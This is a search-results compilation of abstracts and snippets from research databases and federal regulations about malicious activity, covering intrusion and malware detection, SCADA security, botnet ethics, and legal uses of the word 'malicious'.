Facilities that manufacture, store or transport significant quantities of radiological material must protect against the risk posed by sabotage events. Much of the analysis of this type of event has been focused on the threat from a radiological dispersion device (RDD) or "dirty bomb" scenario, in which a malicious assailant would, by explosives or other means, loft a significant quantity of radioactive material into a plume that would expose and contaminate people and property. Although the consequences in cost and psychological terror would be severe, no intentional RDD terrorism events are on record. Conversely, incidents in which a victim ormore » victims were maliciously exposed to a Radiological Exposure Device (RED), without dispersal of radioactive material, are well documented. This paper represents a technical basis for the threat profile related to the risk of nefarious use of an RED, including assailant and material characterization. Radioactive materials of concern are detailed in Appendix A.« less

Detecting malicious chaotic signals in wireless sensor network

NASA Astrophysics Data System (ADS)

Upadhyay, Ranjit Kumar; Kumari, Sangeeta

2018-02-01

In this paper, an e-epidemic Susceptible-Infected-Vaccinated (SIV) model has been proposed to analyze the effect of node immunization and worms attacking dynamics in wireless sensor network. A modified nonlinear incidence rate with cyrtoid type functional response has been considered using sleep and active mode approach. Detailed stability analysis and the sufficient criteria for the persistence of the model system have been established. We also established different types of bifurcation analysis for different equilibria at different critical points of the control parameters. We performed a detailed Hopf bifurcation analysis and determine the direction and stability of the bifurcating periodic solutions using center manifold theorem. Numerical simulations are carried out to confirm the theoretical results. The impact of the control parameters on the dynamics of the model system has been investigated and malicious chaotic signals are detected. Finally, we have analyzed the effect of time delay on the dynamics of the model system.

Real-Time SCADA Cyber Protection Using Compression Techniques

DOE Office of Scientific and Technical Information (OSTI.GOV)

Lyle G. Roybal; Gordon H Rueff

2013-11-01

The Department of Energy’s Office of Electricity Delivery and Energy Reliability (DOE-OE) has a critical mission to secure the energy infrastructure from cyber attack. Through DOE-OE’s Cybersecurity for Energy Delivery Systems (CEDS) program, the Idaho National Laboratory (INL) has developed a method to detect malicious traffic on Supervisory, Control, and Data Acquisition (SCADA) network using a data compression technique. SCADA network traffic is often repetitive with only minor differences between packets. Research performed at the INL showed that SCADA network traffic has traits desirable for using compression analysis to identify abnormal network traffic. An open source implementation of a Lempel-Ziv-Welchmore » (LZW) lossless data compression algorithm was used to compress and analyze surrogate SCADA traffic. Infected SCADA traffic was found to have statistically significant differences in compression when compared against normal SCADA traffic at the packet level. The initial analyses and results are clearly able to identify malicious network traffic from normal traffic at the packet level with a very high confidence level across multiple ports and traffic streams. Statistical differentiation between infected and normal traffic level was possible using a modified data compression technique at the 99% probability level for all data analyzed. However, the conditions tested were rather limited in scope and need to be expanded into more realistic simulations of hacking events using techniques and approaches that are better representative of a real-world attack on a SCADA system. Nonetheless, the use of compression techniques to identify malicious traffic on SCADA networks in real time appears to have significant merit for infrastructure protection.« less

A robust cooperative spectrum sensing scheme based on Dempster-Shafer theory and trustworthiness degree calculation in cognitive radio networks

NASA Astrophysics Data System (ADS)

Wang, Jinlong; Feng, Shuo; Wu, Qihui; Zheng, Xueqiang; Xu, Yuhua; Ding, Guoru

2014-12-01

Cognitive radio (CR) is a promising technology that brings about remarkable improvement in spectrum utilization. To tackle the hidden terminal problem, cooperative spectrum sensing (CSS) which benefits from the spatial diversity has been studied extensively. Since CSS is vulnerable to the attacks initiated by malicious secondary users (SUs), several secure CSS schemes based on Dempster-Shafer theory have been proposed. However, the existing works only utilize the current difference of SUs, such as the difference in SNR or similarity degree, to evaluate the trustworthiness of each SU. As the current difference is only one-sided and sometimes inaccurate, the statistical information contained in each SU's historical behavior should not be overlooked. In this article, we propose a robust CSS scheme based on Dempster-Shafer theory and trustworthiness degree calculation. It is carried out in four successive steps, which are basic probability assignment (BPA), trustworthiness degree calculation, selection and adjustment of BPA, and combination by Dempster-Shafer rule, respectively. Our proposed scheme evaluates the trustworthiness degree of SUs from both current difference aspect and historical behavior aspect and exploits Dempster-Shafer theory's potential to establish a `soft update' approach for the reputation value maintenance. It can not only differentiate malicious SUs from honest ones based on their historical behaviors but also reserve the current difference for each SU to achieve a better real-time performance. Abundant simulation results have validated that the proposed scheme outperforms the existing ones under the impact of different attack patterns and different number of malicious SUs.

25 CFR 1000.272 - Do Tribes/Consortia need to be aware of areas which FTCA does not cover?

Code of Federal Regulations, 2010 CFR

2010-04-01

... imprisonment, false arrest, malicious prosecution, abuse of process, libel, slander, misrepresentation, deceit, or interference with contract rights, unless otherwise authorized by 28 U.S.C. 2680(h). (b) What...

A Study of Gaps in Attack Analysis

DTIC Science & Technology

2016-10-12

2014. [86] Shobha Venkataraman , David Brumley, Subhabrata Sen, and Oliver Spatscheck. Automati- cally Inferring the Evolution of Malicious Activity on...Shobha Venkataraman , Subhabrata Sen, Oliver Spatscheck, Patrick Haffner, and Dawn Song. Exploiting Network Structure for Proactive Spam Mitigation. In

Protecting computer-based medical devices: defending against viruses and other threats.

PubMed

2005-07-01

The increasing integration of computer hardware has exposed medical devices to greater risks than ever before. More and more devices rely on commercial off-the-shelf software and operating systems, which are vulnerable to the increasing proliferation of viruses and other malicious programs that target computers. Therefore, it is necessary for hospitals to take steps such as those outlined in this article to ensure that their computer-based devices are made safe and continue to remain safe in the future. Maintaining the security of medical devices requires planning, careful execution, and a commitment of resources. A team should be created to develop a process for surveying the security status of all computerized devices in the hospital and making sure that patches and other updates are applied as needed. These patches and updates should be approved by the medical system supplier before being implemented. The team should consider using virtual local area networks to isolate susceptible devices on the hospital's network. All security measures should be carefully documented, and the documentation should be kept up-to-date. Above all, care must be taken to ensure that medical device security involves a collaborative, supportive partnership between the hospital's information technology staff and biomedical engineering personnel.

Fast Flux Watch: A mechanism for online detection of fast flux networks.

PubMed

Al-Duwairi, Basheer N; Al-Hammouri, Ahmad T

2014-07-01

Fast flux networks represent a special type of botnets that are used to provide highly available web services to a backend server, which usually hosts malicious content. Detection of fast flux networks continues to be a challenging issue because of the similar behavior between these networks and other legitimate infrastructures, such as CDNs and server farms. This paper proposes Fast Flux Watch (FF-Watch), a mechanism for online detection of fast flux agents. FF-Watch is envisioned to exist as a software agent at leaf routers that connect stub networks to the Internet. The core mechanism of FF-Watch is based on the inherent feature of fast flux networks: flux agents within stub networks take the role of relaying client requests to point-of-sale websites of spam campaigns. The main idea of FF-Watch is to correlate incoming TCP connection requests to flux agents within a stub network with outgoing TCP connection requests from the same agents to the point-of-sale website. Theoretical and traffic trace driven analysis shows that the proposed mechanism can be utilized to efficiently detect fast flux agents within a stub network.

Approaches for scalable modeling and emulation of cyber systems : LDRD final report.

DOE Office of Scientific and Technical Information (OSTI.GOV)

Mayo, Jackson R.; Minnich, Ronald G.; Armstrong, Robert C.

2009-09-01

The goal of this research was to combine theoretical and computational approaches to better understand the potential emergent behaviors of large-scale cyber systems, such as networks of {approx} 10{sup 6} computers. The scale and sophistication of modern computer software, hardware, and deployed networked systems have significantly exceeded the computational research community's ability to understand, model, and predict current and future behaviors. This predictive understanding, however, is critical to the development of new approaches for proactively designing new systems or enhancing existing systems with robustness to current and future cyber threats, including distributed malware such as botnets. We have developed preliminarymore » theoretical and modeling capabilities that can ultimately answer questions such as: How would we reboot the Internet if it were taken down? Can we change network protocols to make them more secure without disrupting existing Internet connectivity and traffic flow? We have begun to address these issues by developing new capabilities for understanding and modeling Internet systems at scale. Specifically, we have addressed the need for scalable network simulation by carrying out emulations of a network with {approx} 10{sup 6} virtualized operating system instances on a high-performance computing cluster - a 'virtual Internet'. We have also explored mappings between previously studied emergent behaviors of complex systems and their potential cyber counterparts. Our results provide foundational capabilities for further research toward understanding the effects of complexity in cyber systems, to allow anticipating and thwarting hackers.« less

A guide to California's breaches. First year of state reporting requirement reveals common privacy violations.

PubMed

Dimick, Chris

2010-04-01

Effective January 1, 2009, California healthcare providers were required to report every breach of patient information to the state. They have sent a flood of mishaps and a steady stream of malicious acts.

12 CFR 263.94 - Conduct warranting sanctions.

Code of Federal Regulations, 2010 CFR

2010-01-01

... an attorney, or debarment or suspension from practice as a certified public accountant or public... that individual's period of suspension, debarment, or ineligibility; (f) Contemptuous conduct in... circulating or publishing malicious or libelous matter; (g) Suspension or debarment from practice before the...

76 FR 22925 - Assumption Buster Workshop: Abnormal Behavior Detection Finds Malicious Actors

Federal Register 2010, 2011, 2012, 2013, 2014

2011-04-25

... Technology Research and Development (NITRD) Program, National Science Foundation. ACTION: Call for... NATIONAL SCIENCE FOUNDATION Assumption Buster Workshop: Abnormal Behavior Detection Finds...: The NCO, on behalf of the Special Cyber Operations Research and Engineering (SCORE) Committee, an...

Data Integrity: Backup

ERIC Educational Resources Information Center

Bergren, Martha Dewey

2005-01-01

School nurses and health office staff have an ethical and legal obligation to protect the integrity of electronic student health records. Various sources, both accidental and malicious, can threaten student health data. School nurses must employ regular and reliable methods to back up student health data.

Finding Malicious Cyber Discussions in Social Media

DTIC Science & Technology

2015-12-11

automatically filter cyber discussions from Stack Exchange, Reddit, and Twitter posts written in English. Criminal hackers often use social media...monitoring hackers on Facebook and in private chat rooms. As a result, system administrators were prepared to counter distributed denial-of-service

Malware Memory Analysis for Non-Specialists: Investigating Publicly Available Memory Image for the Stuxnet Worm

DTIC Science & Technology

2013-11-01

may be considered moderately suspicious. [20, 21, 22 and 23] PID 1580 (jqs.exe) is using port 5152, a port associated to with Java Quick Starter [26...spoolsv.exe 0x01000000 True False True \\WINDOWS\\system32\\spoolsv.exe 1580 jqs.exe 0x00400000 True False True \\Program Files\\ Java \\jre6\\bin\\jqs.exe 1664...Files\\ Java \\ Java Update\\jusched.exe 1816 VMUpgradeHelp er 0x00400000 True False True \\Program Files\\VMware\\VMware Tools\\VMUpgradeHelper.exe 1872

Malware Memory Analysis for Non-specialists: Investigating Publicly Available Memory Image 0zapftis (R2D2)

DTIC Science & Technology

2013-10-01

investigators can conduct meaningful memory-based investigations on their own. This technical memorandum examines the 0zapftis (R2D2) Trojan horse , in order...TM 2013-018 and TM 2013-155, examined the Zeus Trojan horse (the former) while the latter examined the Prolaco worm and SpyEye Trojan horse . It is...necessary for a novice to conduct such memory analyses on his own. The first report in this series written by the author examined the Zeus Trojan Horse

32 CFR 536.45 - Statutory exceptions.

Code of Federal Regulations, 2010 CFR

2010-07-01

... employee of the government, whether or not the discretion is abused. This exclusion does not apply to a... imprisonment, false arrest, malicious prosecution, abuse of process, libel, slander, misrepresentation, deceit, or interference with contract rights, except for acts or omissions of investigation of law...

25 CFR 900.183 - Do Indian tribes and tribal organizations need to be aware of areas which FTCA does not cover?

Code of Federal Regulations, 2010 CFR

2010-04-01

..., battery, false imprisonment, false arrest, malicious prosecution, abuse of process, libel, slander, misrepresentation, deceit, or interference with contract rights, unless otherwise authorized by 28 U.S.C. 2680(h...

Malicious Activity Simulation Tool (MAST) and Trust

DTIC Science & Technology

2015-06-01

application through discovery and remediation of flaws. B. DESIGN AND DEVELOPMENT CONSIDERATIONS Design and development focuses on the actual...protection of the backup and restoration of the application. COBR -1 X V-16846 The IAO will ensure a disaster recovery plan exists in accordance

27 CFR 70.609 - Supervision.

Code of Federal Regulations, 2010 CFR

2010-04-01

... 27 Alcohol, Tobacco Products and Firearms 2 2010-04-01 2010-04-01 false Supervision. 70.609... From Disaster, Vandalism, or Malicious Mischief Destruction of Liquors § 70.609 Supervision. When... official or made unmarketable, the liquors shall be destroyed by suitable means under supervision...

27 CFR 70.609 - Supervision.

Code of Federal Regulations, 2014 CFR

2014-04-01

... 27 Alcohol, Tobacco Products and Firearms 2 2014-04-01 2014-04-01 false Supervision. 70.609... From Disaster, Vandalism, or Malicious Mischief Destruction of Liquors § 70.609 Supervision. When... official or made unmarketable, the liquors shall be destroyed by suitable means under supervision...

27 CFR 70.609 - Supervision.

Code of Federal Regulations, 2011 CFR

2011-04-01

... 27 Alcohol, Tobacco Products and Firearms 2 2011-04-01 2011-04-01 false Supervision. 70.609... From Disaster, Vandalism, or Malicious Mischief Destruction of Liquors § 70.609 Supervision. When... official or made unmarketable, the liquors shall be destroyed by suitable means under supervision...

27 CFR 70.609 - Supervision.

Code of Federal Regulations, 2013 CFR

2013-04-01

... 27 Alcohol, Tobacco Products and Firearms 2 2013-04-01 2013-04-01 false Supervision. 70.609... From Disaster, Vandalism, or Malicious Mischief Destruction of Liquors § 70.609 Supervision. When... official or made unmarketable, the liquors shall be destroyed by suitable means under supervision...

75 FR 35508 - Draft Regulatory Guide: Issuance, Availability

Federal Register 2010, 2011, 2012, 2013, 2014

2010-06-22

... Systems and Networks,'' requires licensees to develop cyber-security plans and programs to protect critical digital assets, including digital safety systems, from malicious cyber attacks. Regulatory Guide 5.71, ``Cyber Security Programs for Nuclear Facilities,'' provides guidance to meet the requirements of...

18 CFR 39.1 - Definitions.

Code of Federal Regulations, 2012 CFR

2012-04-01

... Mexico. Cybersecurity Incident means a malicious act or suspicious event that disrupts, or was an attempt... includes requirements for the operation of existing Bulk-Power System facilities, including cybersecurity... failures of such system will not occur as a result of a sudden disturbance, including a Cybersecurity...

18 CFR 39.1 - Definitions.

Code of Federal Regulations, 2010 CFR

2010-04-01

... Mexico. Cybersecurity Incident means a malicious act or suspicious event that disrupts, or was an attempt... includes requirements for the operation of existing Bulk-Power System facilities, including cybersecurity... failures of such system will not occur as a result of a sudden disturbance, including a Cybersecurity...

18 CFR 39.1 - Definitions.

Code of Federal Regulations, 2013 CFR

2013-04-01

... Mexico. Cybersecurity Incident means a malicious act or suspicious event that disrupts, or was an attempt... includes requirements for the operation of existing Bulk-Power System facilities, including cybersecurity... failures of such system will not occur as a result of a sudden disturbance, including a Cybersecurity...

18 CFR 39.1 - Definitions.

Code of Federal Regulations, 2014 CFR

2014-04-01

... Mexico. Cybersecurity Incident means a malicious act or suspicious event that disrupts, or was an attempt... includes requirements for the operation of existing Bulk-Power System facilities, including cybersecurity... failures of such system will not occur as a result of a sudden disturbance, including a Cybersecurity...

18 CFR 39.1 - Definitions.

Code of Federal Regulations, 2011 CFR

2011-04-01

... Mexico. Cybersecurity Incident means a malicious act or suspicious event that disrupts, or was an attempt... includes requirements for the operation of existing Bulk-Power System facilities, including cybersecurity... failures of such system will not occur as a result of a sudden disturbance, including a Cybersecurity...

A Cross-Layer, Anomaly-Based IDS for WSN and MANET

PubMed Central

Amouri, Amar; Manthena, Raju

2018-01-01

Intrusion detection system (IDS) design for mobile adhoc networks (MANET) is a crucial component for maintaining the integrity of the network. The need for rapid deployment of IDS capability with minimal data availability for training and testing is an important requirement of such systems, especially for MANETs deployed in highly dynamic scenarios, such as battlefields. This work proposes a two-level detection scheme for detecting malicious nodes in MANETs. The first level deploys dedicated sniffers working in promiscuous mode. Each sniffer utilizes a decision-tree-based classifier that generates quantities which we refer to as correctly classified instances (CCIs) every reporting time. In the second level, the CCIs are sent to an algorithmically run supernode that calculates quantities, which we refer to as the accumulated measure of fluctuation (AMoF) of the received CCIs for each node under test (NUT). A key concept that is used in this work is that the variability of the smaller size population which represents the number of malicious nodes in the network is greater than the variance of the larger size population which represents the number of normal nodes in the network. A linear regression process is then performed in parallel with the calculation of the AMoF for fitting purposes and to set a proper threshold based on the slope of the fitted lines. As a result, the malicious nodes are efficiently and effectively separated from the normal nodes. The proposed scheme is tested for various node velocities and power levels and shows promising detection performance even at low-power levels. The results presented also apply to wireless sensor networks (WSN) and represent a novel IDS scheme for such networks. PMID:29470446

A Cross-Layer, Anomaly-Based IDS for WSN and MANET.

PubMed

Amouri, Amar; Morgera, Salvatore D; Bencherif, Mohamed A; Manthena, Raju

2018-02-22

Intrusion detection system (IDS) design for mobile adhoc networks (MANET) is a crucial component for maintaining the integrity of the network. The need for rapid deployment of IDS capability with minimal data availability for training and testing is an important requirement of such systems, especially for MANETs deployed in highly dynamic scenarios, such as battlefields. This work proposes a two-level detection scheme for detecting malicious nodes in MANETs. The first level deploys dedicated sniffers working in promiscuous mode. Each sniffer utilizes a decision-tree-based classifier that generates quantities which we refer to as correctly classified instances (CCIs) every reporting time. In the second level, the CCIs are sent to an algorithmically run supernode that calculates quantities, which we refer to as the accumulated measure of fluctuation (AMoF) of the received CCIs for each node under test (NUT). A key concept that is used in this work is that the variability of the smaller size population which represents the number of malicious nodes in the network is greater than the variance of the larger size population which represents the number of normal nodes in the network. A linear regression process is then performed in parallel with the calculation of the AMoF for fitting purposes and to set a proper threshold based on the slope of the fitted lines. As a result, the malicious nodes are efficiently and effectively separated from the normal nodes. The proposed scheme is tested for various node velocities and power levels and shows promising detection performance even at low-power levels. The results presented also apply to wireless sensor networks (WSN) and represent a novel IDS scheme for such networks.

Computer Abuse: Vandalizing the Information Society.

ERIC Educational Resources Information Center

Furnell, Steven M.; Warren, Matthew J.

1997-01-01

Computing and telecommunications, key to an information-based society, are increasingly targets for criminals and mischief makers. This article examines the effects of malicious computer abuse: hacking and viruses, highlights the apparent increase in incidents, and examines their effect on public perceptions of technology. Presents broad…

27 CFR 70.609 - Supervision.

Code of Federal Regulations, 2012 CFR

2012-04-01

... 27 Alcohol, Tobacco Products and Firearms 2 2012-04-01 2011-04-01 true Supervision. 70.609 Section... Disaster, Vandalism, or Malicious Mischief Destruction of Liquors § 70.609 Supervision. When allowance has... or made unmarketable, the liquors shall be destroyed by suitable means under supervision satisfactory...

The Relationship between Personality and Computer Deviance

ERIC Educational Resources Information Center

Burns, Cardra E.

2013-01-01

Computer deviance by employees, defined as malicious and nonmalicious computer use behaviors, has contributed to billions of dollars of monetary and productivity losses for public and private sector organizations. The purpose of this correlational study was to examine the relationship between personality characteristics and employees' computer…

The emotional responses of browsing Facebook: Happiness, envy, and the role of tie strength

PubMed Central

Lin, Ruoyun; Utz, Sonja

2015-01-01

On Facebook, users are exposed to posts from both strong and weak ties. Even though several studies have examined the emotional consequences of using Facebook, less attention has been paid to the role of tie strength. This paper aims to explore the emotional outcomes of reading a post on Facebook and examine the role of tie strength in predicting happiness and envy. Two studies – one correlational, based on a sample of 207 American participants and the other experimental, based on a sample of 194 German participants – were conducted in 2014. In Study 2, envy was further distinguished into benign and malicious envy. Based on a multi-method approach, the results showed that positive emotions are more prevalent than negative emotions while browsing Facebook. Moreover, tie strength is positively associated with the feeling of happiness and benign envy, whereas malicious envy is independent of tie strength after reading a (positive) post on Facebook. PMID:26877584

A Case Study in Ethical Decision Making Regarding Remote Mitigation of Botnets

NASA Astrophysics Data System (ADS)

Dittrich, David; Leder, Felix; Werner, Tillmann

It is becoming more common for researchers to find themselves in a position of being able to take over control of a malicious botnet. If this happens, should they use this knowledge to clean up all the infected hosts? How would this affect not only the owners and operators of the zombie computers, but also other researchers, law enforcement agents serving justice, or even the criminals themselves? What dire circumstances would change the calculus about what is or is not appropriate action to take? We review two case studies of long-lived malicious botnets that present serious challenges to researchers and responders and use them to illuminate many ethical issues regarding aggressive mitigation. We make no judgments about the questions raised, instead laying out the pros and cons of possible choices and allowing workshop attendees to consider how and where they would draw lines. By this, we hope to expose where there is clear community consensus as well as where controversy or uncertainty exists.

Evil acts and malicious gossip: a multiagent model of the effects of gossip in socially distributed person perception.

PubMed

Smith, Eliot R

2014-11-01

Although person perception is central to virtually all human social behavior, it is ordinarily studied in isolated individual perceivers. Conceptualizing it as a socially distributed process opens up a variety of novel issues, which have been addressed in scattered literatures mostly outside of social psychology. This article examines some of these issues using a series of multiagent models. Perceivers can use gossip (information from others about social targets) to improve their ability to detect targets who perform rare negative behaviors. The model suggests that they can simultaneously protect themselves against being influenced by malicious gossip intended to defame specific targets. They can balance these potentially conflicting goals by using specific strategies including disregarding gossip that differs from a personally obtained impression. Multiagent modeling demonstrates the outcomes produced by different combinations of assumptions about gossip, and suggests directions for further research and theoretical development. © 2014 by the Society for Personality and Social Psychology, Inc.

DCT-based cyber defense techniques

NASA Astrophysics Data System (ADS)

Amsalem, Yaron; Puzanov, Anton; Bedinerman, Anton; Kutcher, Maxim; Hadar, Ofer

2015-09-01

With the increasing popularity of video streaming services and multimedia sharing via social networks, there is a need to protect the multimedia from malicious use. An attacker may use steganography and watermarking techniques to embed malicious content, in order to attack the end user. Most of the attack algorithms are robust to basic image processing techniques such as filtering, compression, noise addition, etc. Hence, in this article two novel, real-time, defense techniques are proposed: Smart threshold and anomaly correction. Both techniques operate at the DCT domain, and are applicable for JPEG images and H.264 I-Frames. The defense performance was evaluated against a highly robust attack, and the perceptual quality degradation was measured by the well-known PSNR and SSIM quality assessment metrics. A set of defense techniques is suggested for improving the defense efficiency. For the most aggressive attack configuration, the combination of all the defense techniques results in 80% protection against cyber-attacks with PSNR of 25.74 db.

Layered Location-Based Security Mechanism for Mobile Sensor Networks: Moving Security Areas.

PubMed

Wang, Ze; Zhang, Haijuan; Wu, Luqiang; Zhou, Chang

2015-09-25

Network security is one of the most important issues in mobile sensor networks (MSNs). Networks are particularly vulnerable in hostile environments because of many factors, such as uncertain mobility, limitations on computation, and the need for storage in mobile nodes. Though some location-based security mechanisms can resist some malicious attacks, they are only suitable for static networks and may sometimes require large amounts of storage. To solve these problems, using location information, which is one of the most important properties in outdoor wireless networks, a security mechanism called a moving security area (MSA) is proposed to resist malicious attacks by using mobile nodes' dynamic location-based keys. The security mechanism is layered by performing different detection schemes inside or outside the MSA. The location-based private keys will be updated only at the appropriate moments, considering the balance of cost and security performance. By transferring parts of the detection tasks from ordinary nodes to the sink node, the memory requirements are distributed to different entities to save limited energy.

A robust trust establishment scheme for wireless sensor networks.

PubMed

Ishmanov, Farruh; Kim, Sung Won; Nam, Seung Yeob

2015-03-23

Security techniques like cryptography and authentication can fail to protect a network once a node is compromised. Hence, trust establishment continuously monitors and evaluates node behavior to detect malicious and compromised nodes. However, just like other security schemes, trust establishment is also vulnerable to attack. Moreover, malicious nodes might misbehave intelligently to trick trust establishment schemes. Unfortunately, attack-resistance and robustness issues with trust establishment schemes have not received much attention from the research community. Considering the vulnerability of trust establishment to different attacks and the unique features of sensor nodes in wireless sensor networks, we propose a lightweight and robust trust establishment scheme. The proposed trust scheme is lightweight thanks to a simple trust estimation method. The comprehensiveness and flexibility of the proposed trust estimation scheme make it robust against different types of attack and misbehavior. Performance evaluation under different types of misbehavior and on-off attacks shows that the detection rate of the proposed trust mechanism is higher and more stable compared to other trust mechanisms.

Classifier fusion for VoIP attacks classification

NASA Astrophysics Data System (ADS)

Safarik, Jakub; Rezac, Filip

2017-05-01

SIP is one of the most successful protocols in the field of IP telephony communication. It establishes and manages VoIP calls. As the number of SIP implementation rises, we can expect a higher number of attacks on the communication system in the near future. This work aims at malicious SIP traffic classification. A number of various machine learning algorithms have been developed for attack classification. The paper presents a comparison of current research and the use of classifier fusion method leading to a potential decrease in classification error rate. Use of classifier combination makes a more robust solution without difficulties that may affect single algorithms. Different voting schemes, combination rules, and classifiers are discussed to improve the overall performance. All classifiers have been trained on real malicious traffic. The concept of traffic monitoring depends on the network of honeypot nodes. These honeypots run in several networks spread in different locations. Separation of honeypots allows us to gain an independent and trustworthy attack information.

Performance Evaluation of AODV with Blackhole Attack

NASA Astrophysics Data System (ADS)

Dara, Karuna

2010-11-01

A Mobile Ad Hoc Network (MANET) is a temporary network set up by a wireless mobile computers moving arbitrary in the places that have no network infrastructure. These nodes maintain connectivity in a decentralized manner. Since the nodes communicate with each other, they cooperate by forwarding data packets to other nodes in the network. Thus the nodes find a path to the destination node using routing protocols. However, due to security vulnerabilities of the routing protocols, mobile ad-hoc networks are unprotected to attacks of the malicious nodes. One of these attacks is the Black Hole Attack against network integrity absorbing all data packets in the network. Since the data packets do not reach the destination node on account of this attack, data loss will occur. In this paper, we simulated the black hole attack in various mobile ad-hoc network scenarios using AODV routing protocol of MANET and have tried to find a effect if number of nodes are increased with increase in malicious nodes.

Encryption and the loss of patient data.

PubMed

Miller, Amalia R; Tucker, Catherine E

2011-01-01

Fast-paced IT advances have made it increasingly possible and useful for firms to collect data on their customers on an unprecedented scale. One downside of this is that firms can experience negative publicity and financial damage if their data are breached. This is particularly the case in the medical sector, where we find empirical evidence that increased digitization of patient data is associated with more data breaches. The encryption of customer data is often presented as a potential solution, because encryption acts as a disincentive for potential malicious hackers, and can minimize the risk of breached data being put to malicious use. However, encryption both requires careful data management policies to be successful and does not ward off the insider threat. Indeed, we find no empirical evidence of a decrease in publicized instances of data loss associated with the use of encryption. Instead, there are actually increases in the cases of publicized data loss due to internal fraud or loss of computer equipment.

Guidelines for computer security in general practice.

PubMed

Schattner, Peter; Pleteshner, Catherine; Bhend, Heinz; Brouns, Johan

2007-01-01

As general practice becomes increasingly computerised, data security becomes increasingly important for both patient health and the efficient operation of the practice. To develop guidelines for computer security in general practice based on a literature review, an analysis of available information on current practice and a series of key stakeholder interviews. While the guideline was produced in the context of Australian general practice, we have developed a template that is also relevant for other countries. Current data on computer security measures was sought from Australian divisions of general practice. Semi-structured interviews were conducted with general practitioners (GPs), the medical software industry, senior managers within government responsible for health IT (information technology) initiatives, technical IT experts, divisions of general practice and a member of a health information consumer group. The respondents were asked to assess both the likelihood and the consequences of potential risks in computer security being breached. The study suggested that the most important computer security issues in general practice were: the need for a nominated IT security coordinator; having written IT policies, including a practice disaster recovery plan; controlling access to different levels of electronic data; doing and testing backups; protecting against viruses and other malicious codes; installing firewalls; undertaking routine maintenance of hardware and software; and securing electronic communication, for example via encryption. This information led to the production of computer security guidelines, including a one-page summary checklist, which were subsequently distributed to all GPs in Australia. This paper maps out a process for developing computer security guidelines for general practice. The specific content will vary in different countries according to their levels of adoption of IT, and cultural, technical and other health service factors. Making these guidelines relevant to local contexts should help maximise their uptake.

Colleges Struggle To Train Experts in Protecting Computer Systems.

ERIC Educational Resources Information Center

McCollum, Kelly

2000-01-01

Describes university courses and programs in protecting computer networks and World Wide Web sites from vandals, cyberterrorists, and malicious hackers. Notes such courses are provided by East Stroudsburg University (Pennsylvania), Purdue University (Indiana), George Mason University (Virginia), and Texas A&M University. Also notes the federal…

SecureCore Security Architecture: Authority Mode and Emergency Management

DTIC Science & Technology

2007-10-16

can shield first responders from social vultures (e.g., “ambulance chasers”) or malicious parties who could intentionally interfere with emergency...hierarchical design Communications Management: network communication Process Management...and Emergency Management 1 I. Introduction During many crises, first- responder access to sensitive, restricted emergency information is

Understanding and Mitigating Forum Spam

ERIC Educational Resources Information Center

Shin, Youngsang

2011-01-01

The Web is large and expanding, making it challenging to attract new visitors to websites. Website operators often use Search Engine Optimization (SEO) techniques to boost the search engine rankings of their sites, thereby maximizing the inflow of visitors. Malicious operators take SEO to the extreme through many unsavory techniques that are often…

Development and Validation of the Family Beliefs Inventory: A Measure of Unrealistic Beliefs among Parents and Adolescents.

ERIC Educational Resources Information Center

Roehling, Patricia Vincent; Robin, Arthur L.

1986-01-01

Evaluated the criterion-related validity of the Family Beliefs Inventory, a new self-report measure of unreasonable beliefs regarding parent-adolescent relationships. Distressed fathers displayed more unreasonable beliefs concerning ruination, obedience, perfectionism, and malicious intent than nondistressed fathers. Distressed adolescents…

Security Implications of Third-Party Accelerators

DTIC Science & Technology

2015-06-11

G. Wheeler, “Undocumented M6800 instructions,” BYTE Magazine, vol. 2, no. 12, pp. 46–47, Dec. 1977. [20] x0r1, “ jellyfish ,” https://github.com/x0r1... jellyfish , 2015. [21] A. Young and M. Yung, Malicious Cryptography: Exposing Cryptovi- rology. John Wiley & Sons, 2004.

Computer Viruses: Prevention, Detection, and Treatment

DTIC Science & Technology

1990-03-12

executed, also carries out its covert function, potentially undetected. This class of attack earned the term "Trojan horse" from the original of Greek ... mythology , signifying a gift which conceals a malicious purpose. 1 cause harm. The offending code may be present in a code segment the user "touches," which

Partners or Competitors?: The Evolution of the DoD/CIA Relationship Since Desert Storm and its Prospects for the Future

DTIC Science & Technology

2013-05-23

Afghanistan.” 39 the shoulders of these two organizations, but on Congressional choices as well. It...Christopher J. Lamb . United States Special Operations Forces. New York, NY: Columbia University Press, 2007. Walker, Stephen G, Akan Malici, and Mark

On Tradeoffs between Trust Accuracy and Resource Consumption in Communications and Social Networks

DTIC Science & Technology

2016-04-11

length, the use of indirect information to establish trust values, and the impact of misbehaving nodes on both communication overhead and the...evaluated). We consider the impact of misbehaving (selfish or malicious) nodes on the evaluation of trust. We also consider the interaction between

Bringing out the Best Board Behavior

ERIC Educational Resources Information Center

Caruso, Nicholas

2004-01-01

The author's advice for for a school board superintendent is to assume incompetence instead of malevolence. Board members who behave inappropriately are a minority, and those with malicious intent are extremely rare. Most misbehaving board members act out of frustration. They may not understand the appropriate role of a board member.…

Integrated Social and Quality of Service Trust Management of Mobile Groups in Ad Hoc Networks

DTIC Science & Technology

2013-01-01

high resiliency to malicious attacks and misbehaving nodes. Keywords—trust management; mobile ad hoc networks; QoS trust; social trust; trust...paper we address an importance issue of trust management protocol design for MANETs: trust bias minimization despite misbehaving nodes performing

Motivating Contributions for Home Computer Security

ERIC Educational Resources Information Center

Wash, Richard L.

2009-01-01

Recently, malicious computer users have been compromising computers en masse and combining them to form coordinated botnets. The rise of botnets has brought the problem of home computers to the forefront of security. Home computer users commonly have insecure systems; these users do not have the knowledge, experience, and skills necessary to…

A Shellcode Detection Method Based on Full Native API Sequence and Support Vector Machine

NASA Astrophysics Data System (ADS)

Cheng, Yixuan; Fan, Wenqing; Huang, Wei; An, Jing

2017-09-01

Dynamic monitoring the behavior of a program is widely used to discriminate between benign program and malware. It is usually based on the dynamic characteristics of a program, such as API call sequence or API call frequency to judge. The key innovation of this paper is to consider the full Native API sequence and use the support vector machine to detect the shellcode. We also use the Markov chain to extract and digitize Native API sequence features. Our experimental results show that the method proposed in this paper has high accuracy and low detection rate.

Integrating multiple data sources for malware classification

DOEpatents

Anderson, Blake Harrell; Storlie, Curtis B; Lane, Terran

2015-04-28

Disclosed herein are representative embodiments of tools and techniques for classifying programs. According to one exemplary technique, at least one graph representation of at least one dynamic data source of at least one program is generated. Also, at least one graph representation of at least one static data source of the at least one program is generated. Additionally, at least using the at least one graph representation of the at least one dynamic data source and the at least one graph representation of the at least one static data source, the at least one program is classified.

PCASSO: a design for secure communication of personal health information via the internet.

PubMed

Baker, D B; Masys, D R

1999-05-01

